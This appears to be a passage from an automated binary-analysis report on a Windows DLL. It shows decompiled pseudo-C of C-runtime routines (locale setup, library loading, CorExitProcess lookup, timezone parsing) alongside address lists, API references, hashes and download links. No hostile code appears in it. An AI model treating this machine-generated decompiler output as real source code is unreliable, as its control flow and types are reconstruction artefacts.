					E6E1847D1();
					return E6E1A9D88(_t113);
					goto L45;
				}
				_t118 =  *((intOrPtr*)(_t115 - 0x70));
				goto L34;
			}

0x6e18c1d9
0x6e18c1e0
0x6e18c1e5
0x6e18c1ea
0x6e18c1f1
0x6e18c1f4
0x6e18c37f
0x6e18c382
0x6e18c386
0x6e18c388
0x6e18c38f
0x6e18c392
0x6e18c39c
0x00000000
0x00000000
0x6e18c1ff
0x6e18c205
0x6e18c207
0x6e18c2a2
0x6e18c2a5
0x00000000
0x6e18c2ab
0x6e18c2ab
0x6e18c2ad
0x6e18c2af
0x00000000
0x6e18c2b5
0x6e18c2b5
0x6e18c2b7
0x00000000
0x6e18c2bd
0x6e18c2bd
0x6e18c2c0
0x00000000
0x6e18c2c6
0x6e18c2c6
0x6e18c2c8
0x6e18c439
0x6e18c43e
0x00000000
0x6e18c2ce
0x6e18c2ce
0x6e18c2d0
0x6e18c42d
0x6e18c432
0x00000000
0x6e18c2d6
0x6e18c2d6
0x6e18c2d8
0x00000000
0x6e18c2de
0x6e18c2de
0x6e18c2e0
0x00000000
0x6e18c2e6
0x6e18c2e6
0x6e18c2e8
0x00000000
0x6e18c2ee
0x6e18c2ee
0x6e18c2f0
0x00000000
0x6e18c2f6
0x6e18c2f6
0x6e18c2f8
0x00000000
0x6e18c2fe
0x6e18c2fe
0x6e18c300
0x00000000
0x6e18c306
0x6e18c306
0x6e18c308
0x00000000
0x6e18c30e
0x6e18c30e
0x6e18c310
0x6e18c421
0x6e18c421
0x6e18c426
0x00000000
0x6e18c316
0x6e18c316
0x6e18c318
0x00000000
0x6e18c31e
0x6e18c31e
0x6e18c320
0x00000000
0x6e18c326
0x6e18c326
0x6e18c328
0x00000000
0x6e18c32e
0x6e18c32e
0x6e18c330
0x00000000
0x6e18c336
0x6e18c336
0x6e18c338
0x00000000
0x6e18c33e
0x6e18c33e
0x6e18c340
0x00000000
0x6e18c346
0x6e18c346
0x6e18c348
0x00000000
0x6e18c34e
0x6e18c34e
0x6e18c350
0x6e18c415
0x6e18c415
0x6e18c41a
0x00000000
0x6e18c356
0x6e18c356
0x6e18c358
0x00000000
0x6e18c35e
0x6e18c35e
0x6e18c360
0x00000000
0x00000000
0x00000000
0x00000000
0x6e18c360
0x6e18c358
0x6e18c350
0x6e18c348
0x6e18c340
0x6e18c338
0x6e18c330
0x6e18c328
0x6e18c320
0x6e18c318
0x6e18c310
0x6e18c308
0x6e18c300
0x6e18c2f8
0x6e18c2f0
0x6e18c2e8
0x6e18c2e0
0x6e18c2d8
0x6e18c2d0
0x6e18c2c8
0x6e18c2c0
0x6e18c2b7
0x6e18c2af
0x6e18c20d
0x6e18c210
0x6e18c214
0x6e18c21a
0x6e18c222
0x6e18c225
0x6e18c228
0x6e18c22d
0x6e18c22f
0x6e18c3f3
0x6e18c3f3
0x6e18c3f6
0x6e18c3a5
0x6e18c3a5
0x6e18c445
0x6e18c448
0x6e18c44d
0x6e18c44d
0x6e18c3ab
0x6e18c3ab
0x6e18c3ad
0x6e18c3b2
0x6e18c3b5
0x6e18c3b8
0x6e18c3c8
0x6e18c3cc
0x6e18c3d6
0x6e18c3d7
0x6e18c3d8
0x6e18c3dd
0x6e18c3e3
0x6e18c3e5
0x6e18c3ec
0x6e18c3ec
0x00000000
0x6e18c3f8
0x6e18c3fa
0x6e18c3fb
0x6e18c407
0x6e18c40e
0x00000000
0x6e18c40e
0x00000000
0x6e18c235
0x6e18c238
0x6e18c23d
0x6e18c244
0x6e18c247
0x6e18c24a
0x6e18c24f
0x6e18c251
0x00000000
0x6e18c257
0x6e18c25a
0x6e18c25f
0x6e18c266
0x6e18c269
0x6e18c26c
0x6e18c271
0x6e18c273
0x00000000
0x6e18c279
0x6e18c27c
0x6e18c281
0x6e18c288
0x6e18c28b
0x6e18c28e
0x6e18c293
0x6e18c295
0x00000000
0x6e18c29b
0x6e18c29b
0x6e18c366
0x6e18c366
0x6e18c367
0x6e18c373
0x6e18c37a
0x00000000
0x6e18c37a
0x6e18c295
0x6e18c273
0x6e18c251
0x6e18c22f
0x6e18c44f
0x6e18c44f
0x6e18c456
0x6e18c462
0x00000000
0x6e18c462
0x6e18c3a2
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 6E18C1E0

Part of subcall function 6E18C465: __EH_prolog3.LIBCMT ref: 6E18C46C

Part of subcall function 6E18DBBD: __EH_prolog3.LIBCMT ref: 6E18DBC4

Strings

+, xrefs: 6E18C27C
?, xrefs: 6E18C238
{, xrefs: 6E18C210
*, xrefs: 6E18C25A

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: *$+$?${
API String ID: 431132790-3939840847
Opcode ID: 84c0367f836d9be2f69c34f507d4f954049a4fbadc28783639d4f5515cb14cb3
Instruction ID: 348826ce164f9c967a6a8d37dedf218a1333d9c78583df21621c0c2facd33cdd
Opcode Fuzzy Hash: 84c0367f836d9be2f69c34f507d4f954049a4fbadc28783639d4f5515cb14cb3
Instruction Fuzzy Hash: 0E61E170D002499ADB50CFE8C4907FFBBFAAB65304F60061AD865AB145C73549C7AF17

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F4A3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E19F4A3(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				void* _t34;
				signed int _t38;
				signed int _t39;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed int _t54;
				void* _t60;
				void* _t65;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				void* _t79;

				_t73 = __eflags;
				_t60 = __edx;
				_t53 = __ecx;
				E6E1A9DBF(0x6e1ecef4, __ebx, __edi, __esi, 0x30);
				_t50 = _t53;
				 *((intOrPtr*)(_t69 - 0x10)) = _t50;
				_t32 = E6E19294A(_t73, _t69 - 0x3c);
				_t51 = _t50 + 0x2c;
				_t54 = 0xb;
				memcpy(_t51, _t32, _t54 << 2);
				_t34 = E6E1C1229(_t60, _t79);
				_t68 =  *((intOrPtr*)(_t69 - 0x10));
				_t65 = _t34;
				 *((intOrPtr*)(_t69 - 0x10)) = _t68;
				 *((intOrPtr*)(_t68 + 8)) = 0;
				 *((intOrPtr*)(_t68 + 0x10)) = 0;
				 *((intOrPtr*)(_t68 + 0x14)) = 0;
				 *((intOrPtr*)(_t68 + 0x18)) = 0;
				_push(_t51);
				_push(0);
				_push( *((intOrPtr*)(_t65 + 0x1c)));
				 *((intOrPtr*)(_t69 - 4)) = 0;
				 *((intOrPtr*)(_t68 + 8)) = E6E184FEB(_t51, 0, _t60, _t65, _t68, _t73);
				E6E19F346(_t68, 0, _t65);
				if( *((char*)(_t68 + 0x28)) == 0) {
					_t38 =  *((intOrPtr*)(_t65 + 0x29));
				} else {
					_t38 =  *((intOrPtr*)(_t65 + 0x28));
				}
				_t39 = _t38;
				 *(_t68 + 0x1c) = _t39;
				if(_t39 < 0 || _t39 >= 0x7f) {
					 *(_t68 + 0x1c) =  *(_t68 + 0x1c) & 0x00000000;
				}
				_t52 = _t68 + 0x20;
				E6E1A0472(_t68, _t52,  *((char*)(_t65 + 0x2b)),  *((char*)(_t65 + 0x2a)),  *((char*)(_t65 + 0x2e)));
				_t47 = E6E1A0472(_t68, _t68 + 0x24,  *((char*)(_t65 + 0x2d)),  *((char*)(_t65 + 0x2c)),  *((char*)(_t65 + 0x2f)));
				if( *((char*)(_t69 + 0xc)) != 0) {
					_t47 = 0x76782b24;
					 *_t52 = 0x76782b24;
					 *((intOrPtr*)(_t68 + 0x24)) = 0x76782b24;
				}
				return E6E1A9D88(_t47);
			}

0x6e19f4a3
0x6e19f4a3
0x6e19f4a3
0x6e19f4aa
0x6e19f4af
0x6e19f4b1
0x6e19f4b8
0x6e19f4bd
0x6e19f4c4
0x6e19f4c7
0x6e19f4c9
0x6e19f4ce
0x6e19f4d1
0x6e19f4d5
0x6e19f4d8
0x6e19f4db
0x6e19f4de
0x6e19f4e1
0x6e19f4e4
0x6e19f4e5
0x6e19f4e6
0x6e19f4e9
0x6e19f4f4
0x6e19f4fc
0x6e19f505
0x6e19f50c
0x6e19f507
0x6e19f507
0x6e19f507
0x6e19f50f
0x6e19f512
0x6e19f517
0x6e19f51e
0x6e19f51e
0x6e19f526
0x6e19f537
0x6e19f551
0x6e19f55a
0x6e19f55c
0x6e19f561
0x6e19f563
0x6e19f563
0x6e19f56b

APIs

__EH_prolog3.LIBCMT ref: 6E19F4AA

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

_Getvals.LIBCPMT ref: 6E19F4FC
_Mpunct.LIBCPMT ref: 6E19F537
_Mpunct.LIBCPMT ref: 6E19F551

Strings

$+xv, xrefs: 6E19F55C

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Mpunct$GetvalsH_prolog3_strlen
String ID: $+xv
API String ID: 3541430992-1686923651
Opcode ID: 44bc046578281575b26f800480909c616a9e22e631b1f75e365d86d8c3db60a8
Instruction ID: 60107d9ff18ab076fb4958b54da8db144e89a059af177630ca9ac3b84e722bf1
Opcode Fuzzy Hash: 44bc046578281575b26f800480909c616a9e22e631b1f75e365d86d8c3db60a8
Instruction Fuzzy Hash: 4C21A3A5504B526FD721CFB4C4907BBBEECBB0C604B14491AE0A9C7A41D734EA81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5AF5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B5AF5(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6e221b98 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6e1f3708 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6E1CF02C(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6e1b5afc
0x6e1b5b70
0x6e1b5b01
0x6e1b5b03
0x6e1b5b0a
0x6e1b5b0e
0x6e1b5b17
0x6e1b5b26
0x6e1b5b2f
0x6e1b5b33
0x6e1b5b7c
0x6e1b5b7e
0x6e1b5b82
0x6e1b5b85
0x6e1b5b85
0x6e1b5b8b
0x6e1b5b8b
0x6e1b5b77
0x6e1b5b7b
0x6e1b5b7b
0x6e1b5b35
0x6e1b5b3e
0x6e1b5b68
0x6e1b5b6b
0x6e1b5b6d
0x6e1b5b6d
0x00000000
0x6e1b5b6d
0x6e1b5b40
0x6e1b5b4b
0x6e1b5b50
0x6e1b5b55
0x00000000
0x00000000
0x6e1b5b5c
0x6e1b5b62
0x6e1b5b66
0x00000000
0x00000000
0x00000000
0x6e1b5b66
0x6e1b5b13
0x00000000
0x00000000
0x00000000
0x6e1b5b15
0x6e1b5b75
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E1B5BB6,00000000,?,00000001,00000000,?,6E1B5CE9,00000001,FlsFree,6E1F37B8,6E1F37C0,00000000), ref: 6E1B5B85

Strings

api-ms-, xrefs: 6E1B5B45

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 84020f8ba3a609f5c7fec98ed60afc80cd3d2e77f2ec910668fa37840cdba724
Instruction ID: 0f11c749010a080f08247bc4515e8bc3521f847c9dfa1f4ac25ec39cefa55263
Opcode Fuzzy Hash: 84020f8ba3a609f5c7fec98ed60afc80cd3d2e77f2ec910668fa37840cdba724
Instruction Fuzzy Hash: E711A331A44625AFDF528BE8CD44B4D77A6BB12770F250520F910E7284D770ED81AAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CD9EC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6E1CD9EC(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6e1ee1b4(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6e1cd9f2
0x6e1cd9f6
0x6e1cda01
0x6e1cda09
0x6e1cda14
0x6e1cda1a
0x6e1cda1e
0x6e1cda25
0x6e1cda2b
0x6e1cda2b
0x6e1cda2d
0x6e1cda32
0x00000000
0x6e1cda37
0x6e1cda3e

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E1CD9BF,00000008,?,6E1CD987,?,0F24087A,00000008), ref: 6E1CDA01
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E1CDA14
FreeLibrary.KERNEL32(00000000,?,?,6E1CD9BF,00000008,?,6E1CD987,?,0F24087A,00000008), ref: 6E1CDA37

Strings

mscoree.dll, xrefs: 6E1CD9FA
CorExitProcess, xrefs: 6E1CDA0C

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c8f46bc83db459676cc84c1cfc41091ffac66d675a09d4f63a626bc7f29971fd
Instruction ID: a34fb5f70d2611095a988e7b45c3197e349c13feca09439e20a72aa788ba18f5
Opcode Fuzzy Hash: c8f46bc83db459676cc84c1cfc41091ffac66d675a09d4f63a626bc7f29971fd
Instruction Fuzzy Hash: 6FF08C30500519FBDF019BD1C919BDE7BA9EB11B56F108060F805E1190CB74CF81FA92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DA8CA, Relevance: 7.9, APIs: 5, Instructions: 373
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E1DA8CA(void* __ebx, void* __edi, signed int __esi, void* __eflags, void* __fp0, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				char _v52;
				char _v60;
				char _v64;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				signed int _t61;
				signed int _t68;
				signed int _t70;
				signed int _t74;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				long _t89;
				signed int* _t92;
				signed int _t93;
				signed int _t96;
				signed int _t99;
				signed int _t103;
				signed int _t106;
				void* _t110;
				signed int _t113;
				void* _t114;
				void* _t116;
				void* _t117;
				char* _t123;
				signed int* _t125;
				signed int _t126;
				void* _t129;
				void* _t131;
				signed int _t132;
				signed int _t134;
				void* _t137;
				intOrPtr _t138;
				char _t150;
				signed int _t153;
				signed int _t157;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				intOrPtr _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t180;
				intOrPtr* _t181;
				signed int _t185;
				signed int _t186;
				void* _t193;
				signed int _t194;
				void* _t195;
				signed int _t196;
				void* _t223;

				_t223 = __fp0;
				_t180 = __esi;
				_t174 = __edi;
				_t61 = E6E1DA35A();
				_v8 = _v8 & 0x00000000;
				_t134 = _t61;
				_v12 = _v12 & 0x00000000;
				_v16 = _t134;
				if(E6E1DA3B8( &_v8) != 0 || E6E1DA360( &_v12) != 0) {
					L45:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E1C22EF();
					asm("int3");
					_t193 = _t195;
					_t196 = _t195 - 0x10;
					_push(_t134);
					_push(_t180);
					_t181 = E6E1DA35A();
					_v52 = 0;
					_v60 = 0;
					_v64 = 0;
					_t68 = E6E1DA3B8( &_v52);
					__eflags = _t68;
					if(_t68 != 0) {
						L65:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E1C22EF();
						asm("int3");
						_push(_t193);
						_t194 = _t196;
						_t70 =  *0x6e21801c; // 0x57d971a9
						_v100 = _t70 ^ _t194;
						 *0x6e218444 =  *0x6e218444 | 0xffffffff;
						 *0x6e218438 =  *0x6e218438 | 0xffffffff;
						_push(0);
						_push(_t181);
						_push(_t174);
						_t175 = 0;
						 *0x6e2223a0 = 0;
						_t74 = E6E1E515D(0x6e1f61d0, 0, _t181, __eflags,  &_v360,  &_v356, 0x100, 0x6e1f61d0);
						__eflags = _t74;
						if(_t74 != 0) {
							__eflags = _t74 - 0x22;
							if(_t74 == 0x22) {
								_t186 = E6E1D1C1E(_v276);
								__eflags = _t186;
								if(__eflags != 0) {
									_t81 = E6E1E515D(0x6e1f61d0, 0, _t186, __eflags,  &_v280, _t186, _v276, 0x6e1f61d0);
									__eflags = _t81;
									if(_t81 == 0) {
										E6E1D1BE4(0);
										_t175 = _t186;
									} else {
										_push(_t186);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E6E1D1BE4();
								}
							}
						} else {
							_t175 =  &_v272;
						}
						asm("sbb esi, esi");
						_t185 =  ~(_t175 -  &_v272) & _t175;
						__eflags = _t175;
						if(_t175 == 0) {
							L80:
							L46();
						} else {
							__eflags =  *_t175;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t175);
								E6E1DA8CA(0x6e1f61d0, _t175, _t185, __eflags, _t223);
							}
						}
						E6E1D1BE4(_t185);
						__eflags = _v16 ^ _t194;
						return E6E1A93EA(_v16 ^ _t194);
					} else {
						_t85 = E6E1DA360( &_v20);
						__eflags = _t85;
						if(_t85 != 0) {
							goto L65;
						} else {
							_t87 = E6E1DA38C( &_v24);
							__eflags = _t87;
							if(_t87 != 0) {
								goto L65;
							} else {
								E6E1D1BE4( *0x6e22239c);
								 *0x6e22239c = 0;
								 *_t196 = 0x6e2223a8;
								_t89 = GetTimeZoneInformation(??);
								__eflags = _t89 - 0xffffffff;
								if(_t89 != 0xffffffff) {
									_t168 =  *0x6e2223a8 * 0x3c;
									_t150 = 1;
									_push(_t174);
									_t177 =  *0x6e2223fc; // 0x0
									 *0x6e2223a0 = 1;
									_v12 = _t168;
									__eflags =  *0x6e2223ee; // 0x0
									if(__eflags != 0) {
										_t106 = _t177 * 0x3c + _t168;
										__eflags = _t106;
										_v12 = _t106;
									}
									__eflags =  *0x6e222442; // 0x0
									if(__eflags == 0) {
										L55:
										_t93 = 0;
										_t150 = 0;
									} else {
										_t103 =  *0x6e222450; // 0x0
										__eflags = _t103;
										if(_t103 == 0) {
											goto L55;
										} else {
											_t93 = (_t103 - _t177) * 0x3c;
										}
									}
									_v20 = _t150;
									_v24 = _t93;
									_t178 = E6E1C24B7(_t168, _t223);
									_t96 = E6E1DA0C8(_t94, 0, 0x6e2223ac, 0xffffffff,  *_t181, 0x3f, 0,  &_v16);
									__eflags = _t96;
									if(_t96 == 0) {
										L59:
										 *((char*)( *_t181)) = 0;
									} else {
										__eflags = _v16;
										if(_v16 != 0) {
											goto L59;
										} else {
											 *((char*)( *_t181 + 0x3f)) = 0;
										}
									}
									_t99 = E6E1DA0C8(_t178, 0, 0x6e222400, 0xffffffff,  *((intOrPtr*)(_t181 + 4)), 0x3f, 0,  &_v16);
									__eflags = _t99;
									if(_t99 == 0) {
										L63:
										 *((char*)( *((intOrPtr*)(_t181 + 4)))) = 0;
									} else {
										__eflags = _v16;
										if(_v16 != 0) {
											goto L63;
										} else {
											 *((char*)( *((intOrPtr*)(_t181 + 4)) + 0x3f)) = 0;
										}
									}
								}
								 *(E6E1DA354()) = _v12;
								 *((intOrPtr*)(E6E1DA348())) = _v20;
								_t92 = E6E1DA34E();
								 *_t92 = _v24;
								return _t92;
							}
						}
					}
				} else {
					_t169 =  *0x6e22239c; // 0x0
					_t180 = _a4;
					if(_t169 == 0) {
						L12:
						E6E1D1BE4(_t169);
						_t153 = _t180;
						_t12 = _t153 + 1; // 0x1
						_t170 = _t12;
						do {
							_t110 =  *_t153;
							_t153 = _t153 + 1;
						} while (_t110 != 0);
						_t13 = _t153 - _t170 + 1; // 0x2
						 *0x6e22239c = E6E1D1C1E(_t13);
						_t113 = E6E1D1BE4(0);
						_t171 =  *0x6e22239c; // 0x0
						if(_t171 == 0) {
							goto L44;
						} else {
							_t157 = _t180;
							_push(_t174);
							_t14 = _t157 + 1; // 0x1
							_t174 = _t14;
							do {
								_t114 =  *_t157;
								_t157 = _t157 + 1;
							} while (_t114 != 0);
							_t15 = _t157 - _t174 + 1; // 0x2
							_t116 = E6E1CEEB6(_t171, _t15, _t180);
							_t195 = _t195 + 0xc;
							if(_t116 == 0) {
								_t174 = 3;
								_push(_t174);
								_t117 = E6E1E320D( *_t134, 0x40, _t180);
								_t195 = _t195 + 0x10;
								if(_t117 == 0) {
									while( *_t180 != 0) {
										_t180 = _t180 + 1;
										_t174 = _t174 - 1;
										if(_t174 != 0) {
											continue;
										}
										break;
									}
									_t134 =  *_t180;
									_pop(_t174);
									if(_t134 == 0x2d) {
										_t180 = _t180 + 1;
									}
									_t160 = E6E1CF009(_t158, _t180) * 0xe10;
									_v8 = _t160;
									while(1) {
										_t172 =  *_t180;
										if(_t172 != 0x2b && _t172 - 0x30 > 9) {
											break;
										}
										_t180 = _t180 + 1;
									}
									__eflags = _t172 - 0x3a;
									if(_t172 == 0x3a) {
										_t180 = _t180 + 1;
										_t160 = _v8 + E6E1CF009(_t160, _t180) * 0x3c;
										_t129 =  *_t180;
										_v8 = _t160;
										__eflags = _t129 - 0x30;
										if(_t129 >= 0x30) {
											_t173 = _t129;
											while(1) {
												_t129 = _t173;
												__eflags = _t173 - 0x39;
												if(_t173 > 0x39) {
													goto L32;
												}
												_t180 = _t180 + 1;
												_t129 =  *_t180;
												_t173 = _t129;
												__eflags = _t129 - 0x30;
												if(_t129 >= 0x30) {
													continue;
												}
												goto L32;
											}
										}
										L32:
										__eflags = _t129 - 0x3a;
										if(_t129 == 0x3a) {
											_t180 = _t180 + 1;
											_t160 = _v8 + E6E1CF009(_t160, _t180);
											_v8 = _t160;
											while(1) {
												_t131 =  *_t180;
												__eflags = _t131 - 0x30;
												if(_t131 < 0x30) {
													goto L37;
												}
												__eflags = _t131 - 0x39;
												if(_t131 <= 0x39) {
													_t180 = _t180 + 1;
													__eflags = _t180;
													continue;
												}
												goto L37;
											}
										}
									}
									L37:
									__eflags = _t134 - 0x2d;
									if(_t134 == 0x2d) {
										_v8 =  ~_t160;
									}
									_t161 =  *_t180;
									__eflags = _t161;
									_v12 = 0 | _t161 != 0x00000000;
									_t123 =  *((intOrPtr*)(_v16 + 4));
									__eflags = _t161;
									if(_t161 == 0) {
										 *_t123 = 0;
										L43:
										 *(E6E1DA354()) = _v8;
										_t125 = E6E1DA348();
										 *_t125 = _v12;
										return _t125;
									}
									_push(3);
									_t126 = E6E1E320D(_t123, 0x40, _t180);
									_t195 = _t195 + 0x10;
									__eflags = _t126;
									if(_t126 == 0) {
										goto L43;
									}
								}
							}
							goto L45;
						}
					} else {
						_t167 = _t169;
						_t132 = _t180;
						while(1) {
							_t137 =  *_t132;
							if(_t137 !=  *_t167) {
								break;
							}
							if(_t137 == 0) {
								L8:
								_t113 = 0;
							} else {
								_t138 =  *((intOrPtr*)(_t132 + 1));
								if(_t138 !=  *((intOrPtr*)(_t167 + 1))) {
									break;
								} else {
									_t132 = _t132 + 2;
									_t167 = _t167 + 2;
									if(_t138 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t113 == 0) {
								L44:
								return _t113;
							} else {
								_t134 = _v16;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t113 = _t132 | 0x00000001;
						__eflags = _t113;
						goto L10;
					}
				}
				L82:
			}

0x6e1da8ca
0x6e1da8ca
0x6e1da8ca
0x6e1da8d4
0x6e1da8d9
0x6e1da8dd
0x6e1da8df
0x6e1da8e7
0x6e1da8f2
0x6e1daa98
0x6e1daa9a
0x6e1daa9b
0x6e1daa9c
0x6e1daa9d
0x6e1daa9e
0x6e1daa9f
0x6e1daaa4
0x6e1daaa8
0x6e1daaaa
0x6e1daaad
0x6e1daaae
0x6e1daab4
0x6e1daabb
0x6e1daabf
0x6e1daac2
0x6e1daac5
0x6e1daacb
0x6e1daacd
0x6e1dabf5
0x6e1dabf5
0x6e1dabf6
0x6e1dabf7
0x6e1dabf8
0x6e1dabf9
0x6e1dabfa
0x6e1dabff
0x6e1dac02
0x6e1dac03
0x6e1dac0b
0x6e1dac12
0x6e1dac15
0x6e1dac22
0x6e1dac29
0x6e1dac2a
0x6e1dac2b
0x6e1dac31
0x6e1dac40
0x6e1dac47
0x6e1dac4f
0x6e1dac51
0x6e1dac5b
0x6e1dac5e
0x6e1dac6b
0x6e1dac6e
0x6e1dac70
0x6e1dac89
0x6e1dac91
0x6e1dac93
0x6e1dac99
0x6e1dac9e
0x6e1dac95
0x6e1dac95
0x00000000
0x6e1dac95
0x6e1dac72
0x6e1dac72
0x6e1dac73
0x6e1dac73
0x6e1dac73
0x6e1daca0
0x6e1dac53
0x6e1dac53
0x6e1dac53
0x6e1dacad
0x6e1dacaf
0x6e1dacb1
0x6e1dacb3
0x6e1dacc3
0x6e1dacc3
0x6e1dacb5
0x6e1dacb5
0x6e1dacb8
0x00000000
0x6e1dacba
0x6e1dacba
0x6e1dacbb
0x6e1dacc0
0x6e1dacb8
0x6e1dacc9
0x6e1dacd4
0x6e1dacdd
0x6e1daad3
0x6e1daad7
0x6e1daadd
0x6e1daadf
0x00000000
0x6e1daae5
0x6e1daae9
0x6e1daaef
0x6e1daaf1
0x00000000
0x6e1daaf7
0x6e1daafd
0x6e1dab02
0x6e1dab08
0x6e1dab0f
0x6e1dab15
0x6e1dab18
0x6e1dab1e
0x6e1dab27
0x6e1dab28
0x6e1dab29
0x6e1dab2f
0x6e1dab35
0x6e1dab38
0x6e1dab3f
0x6e1dab44
0x6e1dab44
0x6e1dab46
0x6e1dab46
0x6e1dab49
0x6e1dab50
0x6e1dab62
0x6e1dab62
